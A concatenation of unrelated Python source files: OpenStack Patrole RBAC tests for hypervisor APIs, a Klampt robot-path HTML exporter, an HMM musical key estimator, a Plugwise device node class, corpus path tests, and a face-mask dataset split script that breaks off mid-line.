# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common import utils
from tempest import config
from tempest.lib import decorators
from patrole_tempest_plugin import rbac_rule_validation
from patrole_tempest_plugin.tests.api.compute import rbac_base
CONF = config.CONF
# Nova split the single os-hypervisors policy into per-action rules in the
# Ussuri release; select the rule names matching the deployment under test.
if CONF.policy_feature_enabled.changed_nova_policies_ussuri:
    _HYPERVISOR_LIST = "os_compute_api:os-hypervisors:list"
    _HYPERVISOR_SHOW = "os_compute_api:os-hypervisors:show"
    _HYPERVISOR_LIST_DETAIL = "os_compute_api:os-hypervisors:list-detail"
    _HYPERVISOR_STATISTICS = "os_compute_api:os-hypervisors:statistics"
    _HYPERVISOR_UPTIME = "os_compute_api:os-hypervisors:uptime"
    _HYPERVISOR_SEARCH = "os_compute_api:os-hypervisors:search"
    _HYPERVISOR_SERVER = "os_compute_api:os-hypervisors:servers"
else:
    # Pre-Ussuri: one blanket policy rule covers all hypervisor actions.
    _HYPERVISOR_LIST = "os_compute_api:os-hypervisors"
    _HYPERVISOR_SHOW = "os_compute_api:os-hypervisors"
    _HYPERVISOR_LIST_DETAIL = "os_compute_api:os-hypervisors"
    _HYPERVISOR_STATISTICS = "os_compute_api:os-hypervisors"
    _HYPERVISOR_UPTIME = "os_compute_api:os-hypervisors"
    _HYPERVISOR_SEARCH = "os_compute_api:os-hypervisors"
    _HYPERVISOR_SERVER = "os_compute_api:os-hypervisors"
class HypervisorRbacTest(rbac_base.BaseV2ComputeRbacTest):
    """RBAC tests for the basic os-hypervisors compute API operations."""
    @classmethod
    def skip_checks(cls):
        # Skip the whole class when the os-hypervisors extension is disabled.
        super(HypervisorRbacTest, cls).skip_checks()
        if not utils.is_extension_enabled('os-hypervisors', 'compute'):
            msg = "%s skipped as os-hypervisors extension not enabled." \
                  % cls.__name__
            raise cls.skipException(msg)
    @classmethod
    def resource_setup(cls):
        # Cache one existing hypervisor to exercise the show/uptime calls on.
        super(HypervisorRbacTest, cls).resource_setup()
        cls.hypervisor =\
            cls.hypervisor_client.list_hypervisors()['hypervisors'][0]
    @decorators.idempotent_id('17bbeb9a-e73e-445f-a771-c794448ef562')
    @rbac_rule_validation.action(
        service="nova",
        rules=[_HYPERVISOR_LIST])
    def test_list_hypervisors(self):
        with self.override_role():
            self.hypervisor_client.list_hypervisors()
    @decorators.idempotent_id('36b95c7d-1085-487a-a674-b7c1ca35f520')
    @rbac_rule_validation.action(
        service="nova",
        rules=[_HYPERVISOR_LIST_DETAIL])
    def test_list_hypervisors_with_details(self):
        with self.override_role():
            self.hypervisor_client.list_hypervisors(detail=True)
    @decorators.idempotent_id('8a7f6f9e-34a6-4480-8875-bba566c3a581')
    @rbac_rule_validation.action(
        service="nova",
        rules=[_HYPERVISOR_SHOW])
    def test_show_hypervisor(self):
        with self.override_role():
            self.hypervisor_client.show_hypervisor(self.hypervisor['id'])
    @decorators.idempotent_id('ca0e465c-6365-4a7f-ae58-6f8ddbca06c2')
    @rbac_rule_validation.action(
        service="nova",
        rules=[_HYPERVISOR_STATISTICS])
    def test_show_hypervisor_statistics(self):
        with self.override_role():
            self.hypervisor_client.show_hypervisor_statistics()
    @decorators.idempotent_id('109b37c5-91ba-4da5-b2a2-d7618d84406d')
    @rbac_rule_validation.action(
        service="nova",
        rules=[_HYPERVISOR_UPTIME])
    def test_show_hypervisor_uptime(self):
        with self.override_role():
            self.hypervisor_client.show_hypervisor_uptime(
                self.hypervisor['id'])
class HypervisorMaxv252RbacTest(rbac_base.BaseV2ComputeRbacTest):
    """RBAC tests for hypervisor search/servers APIs removed in microversion 2.53."""
    # These tests will fail with a 404 starting from microversion 2.53:
    # See the following links for details:
    # https://docs.openstack.org/api-ref/compute/#list-hypervisor-servers
    # https://docs.openstack.org/api-ref/compute/#search-hypervisor
    max_microversion = '2.52'
    @classmethod
    def skip_checks(cls):
        # Skip the whole class when the os-hypervisors extension is disabled.
        super(HypervisorMaxv252RbacTest, cls).skip_checks()
        if not utils.is_extension_enabled('os-hypervisors', 'compute'):
            msg = "%s skipped as os-hypervisors extension not enabled." \
                  % cls.__name__
            raise cls.skipException(msg)
    @classmethod
    def resource_setup(cls):
        # Cache one existing hypervisor whose hostname is used below.
        super(HypervisorMaxv252RbacTest, cls).resource_setup()
        cls.hypervisor =\
            cls.hypervisor_client.list_hypervisors()['hypervisors'][0]
    @decorators.idempotent_id('b86f03cf-2e79-4d88-9eea-62f761591413')
    @rbac_rule_validation.action(
        service="nova",
        rules=[_HYPERVISOR_SERVER])
    def test_list_servers_on_hypervisor(self):
        with self.override_role():
            self.hypervisor_client.list_servers_on_hypervisor(
                self.hypervisor['hypervisor_hostname'])
    @decorators.idempotent_id('3dbc71c1-8f04-4674-a67c-dcb2fd99b1b4')
    @rbac_rule_validation.action(
        service="nova",
        rules=[_HYPERVISOR_SEARCH])
    def test_search_hypervisor(self):
        with self.override_role():
            self.hypervisor_client.search_hypervisor(
                self.hypervisor['hypervisor_hostname'])
|
# File: Python/python2_version/klampt/io/html.py
from klampt import *
from klampt.model import trajectory
from klampt import robotsim
import json
# Placeholder tokens in the boilerplate HTML file; each is substituted with
# generated content (title, scene JSON, path JSON, RPC stream, compression
# flag, timestep) when the page is saved in HTMLSharePath.end().
_title_id = '__TITLE__'
_scene_id = '__SCENE_JSON__'
_path_id = '__PATH_JSON__'
_rpc_id = '__RPC_JSON__'
_compressed_id = '__COMPRESSED__'
_dt_id = '__TIMESTEP__'
def make_fixed_precision(obj,digits):
    """Recursively round every float in `obj` to `digits` decimal places.

    Lists and dicts are modified in place (and returned); tuples are
    converted to new lists; floats are rounded; anything else is returned
    unchanged.
    """
    if isinstance(obj, float):
        return round(obj, digits)
    if isinstance(obj, tuple):
        # tuples become lists so the result stays JSON-friendly
        return [make_fixed_precision(item, digits) for item in obj]
    if isinstance(obj, list):
        for index, item in enumerate(obj):
            obj[index] = make_fixed_precision(item, digits)
    elif isinstance(obj, dict):
        for key in obj:
            obj[key] = make_fixed_precision(obj[key], digits)
    return obj
class HTMLSharePath:
    """An exporter that converts animations to shareable HTML files.
    Examples::
        sharer = HTMLSharePath("mypath.html",name="My spiffy path")
        sharer.start(sim) #or world
        while [simulation is running]:
            #do whatever control you wish to do here
            sim.simulate(...)
            sharer.animate()
        sharer.end() #this saves to the given filename
    """
    def __init__(self,filename="path.html",name="Klamp't Three.js app",boilerplate='auto'):
        """
        Args:
            filename (str): the HTML file to generate
            name (str): the title of the HTML page
            boilerplate (str): the location of the boilerplate HTML file. If 'auto', it's automatically
                found in the ``klampt/data`` folder.
        """
        self.name = name
        if boilerplate == 'auto':
            import pkg_resources
            boilerplate = pkg_resources.resource_filename('klampt','data/share_path_boilerplate.html')
        f = open(boilerplate,'r')
        self.boilerplate_file = ''.join(f.readlines())
        f.close()
        # Fail early if the template is missing any substitution placeholder.
        if any(v not in self.boilerplate_file for v in [_title_id,_scene_id,_path_id,_rpc_id,_compressed_id,_dt_id]):
            raise RuntimeError("Boilerplate file does not contain the right tags")
        self.fn = filename
        self.scene = []        # scene JSON produced by start()
        self.transforms = {}   # object name -> per-frame matrix (or None if unchanged)
        self.rpc = []          # one RPC entry per recorded frame
        self.dt = 0            # time step between frames; fixed by the first animate() call
        self.last_t = 0        # timestamp of the last recorded frame
    def start(self,world):
        """Begins the path saving with the given WorldModel or Simulator"""
        if isinstance(world,Simulator):
            self.sim = world
            self.world = world.world
            self.last_t = world.getTime()
        else:
            self.sim = None
            self.world = world
        self.scene = robotsim.ThreeJSGetScene(self.world)
    def animate(self,time=None):
        """Updates the path from the world. If the world wasn't a simulator, the time
        argument needs to be provided"""
        if self.sim != None and time == None:
            time = self.sim.getTime()
            self.sim.updateWorld()
        dt = time - self.last_t
        # The very first call fixes the frame time step for the whole path.
        if self.dt == 0:
            self.dt = dt
        if self.dt == 0:
            return
        # snap tiny floating point drift onto the fixed time step
        if abs(dt - self.dt) <= 1e-6:
            dt = self.dt
        numadd = 0
        # If more than self.dt elapsed, record the current pose repeatedly so
        # the saved animation keeps an even frame spacing.
        while dt >= self.dt:
            numadd += 1
            transforms = json.loads(robotsim.ThreeJSGetTransforms(self.world))
            for update in transforms['object']:
                n = update['name']
                mat = make_fixed_precision(update['matrix'],4)
                matpath = self.transforms.setdefault(n,[])
                assert len(matpath) == len(self.rpc)
                # find the last recorded (non-None) matrix for this object
                lastmat = None
                for m in matpath[::-1]:
                    if m != None:
                        lastmat = m
                        break
                # store None for unchanged frames to keep the file compact
                if lastmat != mat:
                    matpath.append(mat)
                else:
                    matpath.append(None)
            self.rpc.append('null')
            dt -= self.dt
            self.last_t += self.dt
        if numadd > 1:
            print "Uneven time spacing, duplicating frame",numadd,"times"
    def end(self):
        # Substitute the recorded data into the boilerplate and write the page.
        data = self.boilerplate_file.replace(_title_id,self.name)
        data = data.replace(_scene_id,self.scene)
        data = data.replace(_path_id,json.dumps(self.transforms))
        data = data.replace(_rpc_id,'['+','.join(self.rpc)+']')
        data = data.replace(_compressed_id,'true')
        data = data.replace(_dt_id,str(self.dt))
        print "Path with",len(self.rpc),"frames saved to",self.fn
        f = open(self.fn,'w')
        f.write(data)
        f.close()
if __name__ == '__main__':
    import sys
    import os
    from klampt import trajectory
    world = WorldModel()
    if len(sys.argv) == 1:
        # Demo mode: drop the ATHLETE robot in a plane world, simulate 2s
        # and export the resulting motion as an HTML page.
        world.readFile("../../data/athlete_plane.xml")
        q = world.robot(0).getConfig()
        q[2] = 2
        world.robot(0).setConfig(q)
        sim = Simulator(world)
        share = HTMLSharePath(name="Klamp't simulation path")
        share.start(sim)
        for i in range(100):
            sim.simulate(0.02)
            share.animate()
        share.end()
    else:
        # Export mode: play back a saved robot trajectory in the given world.
        assert len(sys.argv) == 3,"Usage: sharepath.py world.xml robot_path"
        world.readFile(sys.argv[1])
        traj = trajectory.RobotTrajectory(world.robot(0))
        traj.load(sys.argv[2])
        world.robot(0).setConfig(traj.milestones[0])
        dt = 0.02
        excess = 1.0  # extra seconds to hold the final configuration
        share = HTMLSharePath(name="Klamp't path "+os.path.split(sys.argv[2])[1])
        share.start(world)
        share.dt = dt
        t = traj.times[0]
        while t < traj.times[-1] + excess:
            world.robot(0).setConfig(traj.eval(t))
            share.animate(t)
            t += dt
        share.end()
|
# File: key_meter_estimation/key_estimation.py
import numpy as np
import partitura
from scipy.stats import mode
from hmm import HMM, ConstantTransitionModel, ObservationModel
from key_profiles import build_key_profile_matrix, KEYS
class KeyProfileObservationModel(ObservationModel):
    """
    Use Key Profiles (pitch class distributions) for computing
    observation probabilities.
    Parameters
    ----------
    key_profile_matrix: {'kp', 'kk', 'cbms'} or np.ndarray
        Empirical pitch class distributions (see definition
        in `key_profiles.py`), or a custom (24, 12) matrix
        (24 keys = 12 major + 12 minor; 12 pitch classes).
    """
    def __init__(self, key_profile_matrix="kp"):
        super().__init__()
        if isinstance(key_profile_matrix, str):
            # Look up one of the predefined empirical profile matrices by name.
            self.key_profile_matrix = build_key_profile_matrix(
                key_profile_matrix
            )
        elif isinstance(key_profile_matrix, np.ndarray):
            assert key_profile_matrix.shape == (24, 12)
            self.key_profile_matrix = key_profile_matrix
    def __call__(self, observation):
        """
        Compute per-key observation (log-)probabilities of a 12-dimensional
        pitch-class vector under a Bernoulli-style key profile model.
        Returns an array of length 24, one entry per key.
        """
        if not self.use_log_probabilities:
            p_obs_given_key = np.array(
                [
                    np.prod((kp ** observation) *
                            (1 - kp) ** (1 - observation))
                    for kp in self.key_profile_matrix
                ]
            )
            return p_obs_given_key
        elif self.use_log_probabilities:
            # NOTE(review): the log branch smooths the profiles with 1e-10
            # (to avoid log(0)) while the linear branch above does not, so the
            # two branches are not exactly equivalent — confirm intended.
            log_p_obs_given_key = np.array(
                [
                    np.sum(
                        (
                            observation * np.log(kp + 1e-10)
                            + np.log1p(-(kp + 1e-10)) * (1 - observation)
                        )
                    )
                    for kp in self.key_profile_matrix
                ]
            )
            return log_p_obs_given_key
def compute_transition_probabilities(inertia_param=0.8):
    """
    Matrix of transition probabilities
    Parameters
    ----------
    inertia_param : float
        Parameter between 0 and 1 indicating how likely it is that
        we will stay on the same key
    Notes
    -----
    * This is a very naive assumption, so you should definitely explore
      other transition probabilities
    """
    # Spread the remaining probability mass uniformly over the 23 other keys.
    modulation_prob = (1.0 - inertia_param) / 23.0
    transition_matrix = np.full((24, 24), modulation_prob)
    np.fill_diagonal(transition_matrix, inertia_param)
    return transition_matrix
def key_identification(
    fn,
    key_profiles="kp",
    inertia_param=0.8,
    piano_roll_resolution=16,
    win_size=2,
    debug=False,
):
    """
    Temperley's Probabilistic Key Identification.

    Parameters
    ----------
    fn : filename
        MIDI file
    key_profiles: {"kp", "kk", "cbms"}
        Key profiles to use in the KeyProfileObservationModel
        (see definition in `key_profiles.py`)
    inertia_param: float
        Parameter between 0 and 1 indicating how likely it is that
        we will stay on the same key
    piano_roll_resolution: int
        Resolution of the piano roll (i.e., how many cells per second)
    win_size: float
        Window size in seconds
    debug: bool
        Currently unused; kept for backward compatibility.

    Returns
    -------
    key : str
        The estimated key of the piece
    log_lik:
        The log-likelihood of the estimated key
    """
    # build observation model
    observation_model = KeyProfileObservationModel(
        key_profile_matrix=key_profiles
    )
    # Compute transition model
    transition_probabilities = compute_transition_probabilities(
        inertia_param=inertia_param
    )
    transition_model = ConstantTransitionModel(transition_probabilities)
    hmm = HMM(
        observation_model=observation_model,
        transition_model=transition_model
    )
    # Load the MIDI performance (not a score)
    ppart = partitura.load_performance_midi(fn)
    # Compute piano roll (pitch x time-cells)
    piano_roll = partitura.utils.compute_pianoroll(
        ppart, time_div=piano_roll_resolution
    ).toarray()
    # Number of windows in the piano roll
    n_windows = int(
        np.ceil(piano_roll.shape[1] / (piano_roll_resolution * win_size))
    )
    # window size in cells
    window_size = win_size * piano_roll_resolution
    # Construct observations (these are non-overlapping windows,
    # but you can test other possibilities)
    observations = np.zeros((n_windows, 12))
    for win in range(n_windows):
        idx = slice(win * window_size, (win + 1) * window_size)
        segment = piano_roll[:, idx].sum(1)
        # Fold MIDI pitches into a 12-dimensional pitch-class distribution
        dist = np.zeros(12)
        pitch_idxs = np.where(segment != 0)[0]
        for pix in pitch_idxs:
            dist[pix % 12] += segment[pix]
        # Normalize pitch class distribution
        if dist.sum() > 0:
            # avoid NaN for empty segments
            dist /= dist.sum()
        observations[win] = dist
    # Compute the most likely key sequence
    path, log_lik = hmm.find_best_sequence(observations)
    # Overall key = most frequent key index along the path.
    # FIX: np.atleast_1d keeps this working across SciPy versions —
    # scipy >= 1.11 returns a scalar ModeResult.mode (so `.mode[0]`
    # raised), while older versions return a length-1 array.
    key_idx = int(np.atleast_1d(mode(path).mode)[0])
    key = KEYS[key_idx]
    return key, log_lik
def wtc_num_to_key(i):
    """Map a piece index (Well-Tempered-Clavier numbering) to its key name.

    Indices repeat with period 48; within a period, groups of four map to
    one of the 12 pitch classes, alternating major/minor every two pieces.
    """
    idx = np.mod(i, 48)
    pitch_class = idx // 4
    is_minor = np.mod(idx // 2, 2) != 0
    if is_minor:
        # Minor keys occupy the second half of the KEYS table.
        return KEYS[pitch_class + 12]
    return KEYS[pitch_class]
|
<reponame>geijt/python-plugwise<filename>plugwise/nodes/__init__.py
"""Plugwise nodes."""
from datetime import datetime
import logging
from ..constants import (
FEATURE_AVAILABLE,
FEATURE_PING,
FEATURE_RELAY,
FEATURE_RSSI_IN,
FEATURE_RSSI_OUT,
PRIORITY_LOW,
UTF8_DECODE,
)
from ..messages.requests import NodeFeaturesRequest, NodeInfoRequest, NodePingRequest
from ..messages.responses import (
NodeFeaturesResponse,
NodeInfoResponse,
NodeJoinAckResponse,
NodePingResponse,
NodeResponse,
)
from ..util import validate_mac, version_to_model
_LOGGER = logging.getLogger(__name__)
class PlugwiseNode:
    """Base class for a Plugwise node.

    Holds state common to all node types (MAC address, availability,
    RSSI/ping statistics, hardware/firmware info, relay state) and routes
    incoming messages to the matching ``_process_*`` handler. Subclasses
    extend message handling via ``message_for_circle`` / ``message_for_sed``.
    """
    def __init__(self, mac, address, message_sender):
        # mac: MAC address string; address: network address of this node;
        # message_sender: callable(request, callback, *extras) that queues
        # a request message for transmission.
        mac = mac.upper()
        if not validate_mac(mac):
            _LOGGER.warning(
                "MAC address is in unexpected format: %s",
                str(mac),
            )
        # Stored as bytes because request/response messages carry the MAC
        # as bytes; the `mac` property decodes it back to str.
        self._mac = bytes(mac, encoding=UTF8_DECODE)
        self.message_sender = message_sender
        self._features = ()
        self._address = address
        # Maps a feature id to the list of subscribed callbacks.
        self._callbacks = {}
        self._last_update = None
        self._available = False
        self._battery_powered = False
        self._measures_power = False
        self._rssi_in = None
        self._rssi_out = None
        self._ping = None
        self._node_type = None
        self._hardware_version = None
        self._firmware_version = None
        self._relay_state = False
        self._last_log_address = None
        self._device_features = None
    @property
    def available(self) -> bool:
        """Current network state of plugwise node."""
        return self._available
    @available.setter
    def available(self, state: bool):
        """Set current network availability state of plugwise node."""
        # Only fire callbacks on an actual state transition.
        if state:
            if not self._available:
                self._available = True
                _LOGGER.debug(
                    "Mark node %s available",
                    self.mac,
                )
                self.do_callback(FEATURE_AVAILABLE["id"])
        else:
            if self._available:
                self._available = False
                _LOGGER.debug(
                    "Mark node %s unavailable",
                    self.mac,
                )
                self.do_callback(FEATURE_AVAILABLE["id"])
    @property
    def battery_powered(self) -> bool:
        """Return True if node is a SED (battery powered) device."""
        return self._battery_powered
    @property
    def hardware_model(self) -> str:
        """Return hardware model."""
        if self._hardware_version:
            return version_to_model(self._hardware_version)
        return None
    @property
    def hardware_version(self) -> str:
        """Return hardware version."""
        if self._hardware_version is not None:
            return self._hardware_version
        return "Unknown"
    @property
    def features(self) -> tuple:
        """Return the abstracted features supported by this plugwise device."""
        return self._features
    @property
    def firmware_version(self) -> str:
        """Return firmware version."""
        if self._firmware_version is not None:
            return str(self._firmware_version)
        return "Unknown"
    @property
    def last_update(self) -> datetime:
        """Return datetime of last received update."""
        return self._last_update
    @property
    def mac(self) -> str:
        """Return the MAC address in string."""
        return self._mac.decode(UTF8_DECODE)
    @property
    def measures_power(self) -> bool:
        """Return True if node can measure power usage."""
        return self._measures_power
    @property
    def name(self) -> str:
        """Return unique name."""
        # NOTE(review): raises TypeError if hardware_model is still None
        # (no info response received yet) — confirm callers only use this
        # after node info is known.
        return self.hardware_model + " (" + str(self._address) + ")"
    @property
    def ping(self) -> int:
        """Return ping roundtrip in ms."""
        if self._ping is not None:
            return self._ping
        return 0
    @property
    def rssi_in(self) -> int:
        """Return inbound RSSI level."""
        if self._rssi_in is not None:
            return self._rssi_in
        return 0
    @property
    def rssi_out(self) -> int:
        """Return outbound RSSI level, based on inbound RSSI level of neighbor node."""
        if self._rssi_out is not None:
            return self._rssi_out
        return 0
    def do_ping(self, callback=None):
        """Send network ping message to node."""
        # ignore_sensor=True forces the ping even without subscribers.
        self._request_ping(callback, True)
    def _request_info(self, callback=None):
        """Request info from node."""
        self.message_sender(
            NodeInfoRequest(self._mac),
            callback,
            0,
            PRIORITY_LOW,
        )
    def _request_features(self, callback=None):
        """Request supported features for this node."""
        self.message_sender(
            NodeFeaturesRequest(self._mac),
            callback,
        )
    def _request_ping(self, callback=None, ignore_sensor=True):
        """Ping node."""
        # Skip the ping if nobody subscribed to the ping feature, unless
        # the caller explicitly asks to ignore that check.
        if ignore_sensor or FEATURE_PING["id"] in self._callbacks:
            self.message_sender(
                NodePingRequest(self._mac),
                callback,
            )
    def message_for_node(self, message):
        """Process received message.

        Any message addressed to this node refreshes its last-update
        timestamp and availability before being dispatched to the
        type-specific handler.
        """
        # NOTE(review): assert is stripped under `python -O`; relies on the
        # caller always passing a NodeResponse.
        assert isinstance(message, NodeResponse)
        if message.mac == self._mac:
            if message.timestamp is not None:
                _LOGGER.debug(
                    "Previous update %s of node %s, last message %s",
                    str(self._last_update),
                    self.mac,
                    str(message.timestamp),
                )
                self._last_update = message.timestamp
            if not self._available:
                # Node came (back) online: mark available and refresh info.
                self.available = True
                self._request_info()
            if isinstance(message, NodePingResponse):
                self._process_ping_response(message)
            elif isinstance(message, NodeInfoResponse):
                self._process_info_response(message)
            elif isinstance(message, NodeFeaturesResponse):
                self._process_features_response(message)
            elif isinstance(message, NodeJoinAckResponse):
                self._process_join_ack_response(message)
            else:
                # Unknown here: give subclass handlers a chance.
                self.message_for_circle(message)
                self.message_for_sed(message)
        else:
            _LOGGER.debug(
                "Skip message, mac of node (%s) != mac at message (%s)",
                message.mac.decode(UTF8_DECODE),
                self.mac,
            )
    def message_for_circle(self, message):
        """Pass messages to PlugwiseCircle class"""
    def message_for_sed(self, message):
        """Pass messages to NodeSED class"""
    def subscribe_callback(self, callback, sensor) -> bool:
        """Subscribe callback to execute when state change happens.

        Returns True when the sensor is a supported feature of this node,
        False otherwise (callback not registered).
        """
        if sensor in self._features:
            if sensor not in self._callbacks:
                self._callbacks[sensor] = []
            self._callbacks[sensor].append(callback)
            return True
        return False
    def unsubscribe_callback(self, callback, sensor):
        """Unsubscribe callback to execute when state change happens."""
        if sensor in self._callbacks:
            self._callbacks[sensor].remove(callback)
    def do_callback(self, sensor):
        """Execute callbacks registered for specified callback type."""
        if sensor in self._callbacks:
            for callback in self._callbacks[sensor]:
                try:
                    # Callbacks receive no payload; subscribers read the new
                    # state back through this node's properties.
                    callback(None)
                # TODO: narrow exception
                except Exception as err:  # pylint: disable=broad-except
                    _LOGGER.error(
                        "Error while executing all callback : %s",
                        err,
                    )
    def _process_join_ack_response(self, message):
        """Process join acknowledge response message"""
        _LOGGER.info(
            "Node %s has (re)joined plugwise network",
            self.mac,
        )
    def _process_ping_response(self, message):
        """Process ping response message.

        Updates RSSI in/out and roundtrip time, firing the matching
        feature callback only when a value actually changed.
        """
        if self._rssi_in != message.rssi_in.value:
            self._rssi_in = message.rssi_in.value
            self.do_callback(FEATURE_RSSI_IN["id"])
        if self._rssi_out != message.rssi_out.value:
            self._rssi_out = message.rssi_out.value
            self.do_callback(FEATURE_RSSI_OUT["id"])
        if self._ping != message.ping_ms.value:
            self._ping = message.ping_ms.value
            self.do_callback(FEATURE_PING["id"])
    def _process_info_response(self, message):
        """Process info response message."""
        _LOGGER.debug(
            "Response info message for node %s, last log address %s",
            self.mac,
            str(message.last_logaddr.value),
        )
        # Relay state arrives as the serialized byte string b"01" (= on).
        if message.relay_state.serialize() == b"01":
            if not self._relay_state:
                self._relay_state = True
                self.do_callback(FEATURE_RELAY["id"])
        else:
            if self._relay_state:
                self._relay_state = False
                self.do_callback(FEATURE_RELAY["id"])
        self._hardware_version = message.hw_ver.value.decode(UTF8_DECODE)
        self._firmware_version = message.fw_ver.value
        self._node_type = message.node_type.value
        if self._last_log_address != message.last_logaddr.value:
            self._last_log_address = message.last_logaddr.value
        _LOGGER.debug("Node type = %s", self.hardware_model)
        if not self._battery_powered:
            _LOGGER.debug("Relay state = %s", str(self._relay_state))
        _LOGGER.debug("Hardware version = %s", str(self._hardware_version))
        _LOGGER.debug("Firmware version = %s", str(self._firmware_version))
    def _process_features_response(self, message):
        """Process features message."""
        # NOTE(review): logged at WARNING although informational — confirm
        # whether DEBUG/INFO was intended.
        _LOGGER.warning(
            "Node %s supports features %s", self.mac, str(message.features.value)
        )
        self._device_features = message.features.value
|
from os.path import join as jj
from typing import List
from workflow.utility import ensure_path, expand_basenames, expand_target_files, touch, unlink
# Dummy parliamentary-protocol basenames of the form
# "prot-<year(s)>[-session]--<number>"; the second dash-separated token is
# treated as the year folder by the tests below.
TEST_DUMMY_FILENAMES = [
    'prot-200708--13',
    'prot-200001--37',
    'prot-198485--141',
    'prot-197576--121',
    'prot-199697--42',
    'prot-1944-höst-fk--28',
    'prot-200607--73',
    'prot-200304--74',
    'prot-1952--fk--22',
    'prot-1932--fk--38',
]
def create_test_source_tree(corpus_path: str, filenames: List[str]):
    """Build a fresh dummy corpus tree: one empty XML per protocol basename.

    Removes any existing tree at `corpus_path`, then creates
    `<corpus_path>/<year>/<basename>.xml` for each entry in `filenames`,
    where <year> is the second dash-separated token of the basename.

    FIX: the `filenames` parameter was previously shadowed by a hard-coded
    copy of TEST_DUMMY_FILENAMES, so the argument was silently ignored.
    FIX: the target filename template lost its `{filename}` interpolation,
    collapsing all files in a year folder onto a single placeholder name —
    which contradicts test_expand_basenames' expected basenames.
    """
    unlink(corpus_path)
    for filename in filenames:
        year_folder = jj(corpus_path, filename.split('-')[1])
        target_file = jj(year_folder, f"{filename}.xml")
        ensure_path(target_file)
        touch(target_file)
def test_expand_basenames():
    """expand_basenames lists (years, basenames) and honors year filters."""
    source_folder: str = jj("tests", "output", "corpus")
    create_test_source_tree(source_folder, TEST_DUMMY_FILENAMES)
    all_years = {name.split('-')[1] for name in TEST_DUMMY_FILENAMES}
    # Without a year filter everything in the dummy tree is returned.
    source_years, target_basenames = expand_basenames(source_folder, "xml")
    assert set(target_basenames) == set(TEST_DUMMY_FILENAMES)
    assert set(source_years) == all_years
    # A filter may be a full year span, a single start year, or a list.
    cases = [
        (197576, {'prot-197576--121'}, {'197576'}),
        (1975, {'prot-197576--121'}, {'197576'}),
        ([1975, 2000], {'prot-197576--121', 'prot-200001--37'}, {'197576', '200001'}),
    ]
    for years, expected_basenames, expected_years in cases:
        source_years, target_basenames = expand_basenames(source_folder, "xml", years=years)
        assert set(target_basenames) == expected_basenames
        assert set(source_years) == expected_years
def test_expand_target_files():
    """expand_target_files maps each source <year>/<basename>.xml to
    <target_folder>/<year>/<basename>.zip.

    FIX: the expected-path template lost its `{filename}` interpolation
    (placeholder "(unknown).zip"), which made every expected entry in a
    year folder identical instead of one per basename.
    """
    source_folder: str = jj("tests", "output", "corpus")
    target_folder: str = jj("tests", "output", "annotated")
    create_test_source_tree(source_folder, TEST_DUMMY_FILENAMES)
    target_files = expand_target_files(source_folder, "xml", target_folder, "zip")
    assert set(target_files) == {
        jj("tests", "output", "annotated", filename.split('-')[1], f"{filename}.zip")
        for filename in TEST_DUMMY_FILENAMES
    }
# def test_resolve_input_arguments():
# source_folder: str = jj("tests", "output", "corpus")
# create_test_source_tree(source_folder, TEST_DUMMY_FILENAMES)
# config_filename: str = "config.yml"
# typed_config: Config = load_typed_config(config_filename)
# source_folder = typed_config.parla_clarin.folder
# source_extension = "xml"
# target_folder = typed_config.annotated_folder
# target_extension = "zip"
# source_years, target_basenames = glob_wildcards(jj(source_folder, r"{year,\d+}", f"{{file}}.{source_extension}"))
# source_years, target_basenames = expand_basenames(source_folder, source_extension)
# target_files = expand(
# jj(target_folder, "{year}", f"{{basename}}.{target_extension}"),
# zip,
# year=source_years,
# basename=target_basenames,
# )
# assert target_files is not None
|
import os
import shutil
from xml.dom.minidom import parse
from shutil import copyfile
import random
import re
# Scan every Pascal-VOC annotation file and count objects/images per class
# ('without_mask' vs everything else).
print('total image num = ', len(os.listdir(os.path.join('../../data/original_data', "images"))))
wo_num = 0        # objects labeled 'without_mask'
w_num = 0         # all other objects (mask worn / worn incorrectly)
wo_image_num = 0  # images containing at least one 'without_mask' object
w_image_num = 0   # incremented once per annotated image (see NOTE below)
for dirname, _, filenames in os.walk('../../data/original_data/annotations'):
    for filename in filenames:
        dom = parse(os.path.join('../../data/original_data/annotations', filename))
        root = dom.documentElement
        objects = root.getElementsByTagName("object")
        for o in objects:
            label_type = o.getElementsByTagName("name")[0].childNodes[0].data
            if label_type == 'without_mask':
                wo_num += 1
            else:
                w_num += 1
        # NOTE(review): this counts every annotated image, not only images
        # that contain a masked object — the print label below ("images with
        # mask object") may overstate; confirm intended semantics.
        w_image_num += 1
        for o in objects:
            label_type = o.getElementsByTagName("name")[0].childNodes[0].data
            if label_type == 'without_mask':
                wo_image_num += 1
                break
print('total without mask object: ', wo_num)
print('total with mask object: ', w_num)
print('total images without mask object: ', wo_image_num)
print('total images with mask object: ', w_image_num)
# Create the train/test output tree.
# FIX: the original `if not exists(train): mkdir(...)` created the test
# directories only when the train directory was missing, and crashed with
# FileExistsError if test dirs already existed (e.g. after an interrupted
# run). os.makedirs(..., exist_ok=True) is idempotent and also creates
# missing parents.
for _subset in ('train', 'test'):
    os.makedirs(os.path.join('../../data', _subset, 'images'), exist_ok=True)
    os.makedirs(os.path.join('../../data', _subset, 'annotations'), exist_ok=True)
annotation_list = os.listdir('../../data/original_data/annotations')
# Fixed seed so the train/test split is reproducible across runs.
random.seed(10)
random.shuffle(annotation_list)
# 75% train / 25% test split.
_split = int(len(annotation_list) / 4 * 3)
train_list = annotation_list[:_split]
test_list = annotation_list[_split:]
# Copy training images/annotations, renumbering files sequentially.
# Images containing a 'without_mask' object are duplicated 4x to counter
# the class imbalance measured above.
train_num = 0
for filename in train_list:
    # Annotation files are named like 'maksssksksss<N>.xml'; recover N to
    # locate the matching image.
    img_id = int(re.findall(r'\d+', filename)[0])
    image_name = '../../data/original_data/images/maksssksksss' + str(img_id)+'.png'
    dom = parse(os.path.join('../../data/original_data/annotations', filename))
    root = dom.documentElement
    objects = root.getElementsByTagName("object")
    wo_mask = False
    for o in objects:
        label_type = o.getElementsByTagName("name")[0].childNodes[0].data
        if label_type == 'without_mask':
            wo_mask = True
            break
    if wo_mask:
        # Oversample: write 4 identical copies under consecutive indices.
        for ii in range(4):
            copyfile(image_name, '../../data/train/images/maksssksksss' + str(train_num)+'.png')
            copyfile(os.path.join('../../data/original_data/annotations', filename), \
                     '../../data/train/annotations/maksssksksss' + str(train_num)+'.xml')
            train_num += 1
    else:
        copyfile(image_name, '../../data/train/images/maksssksksss' + str(train_num) + '.png')
        copyfile(os.path.join('../../data/original_data/annotations', filename), \
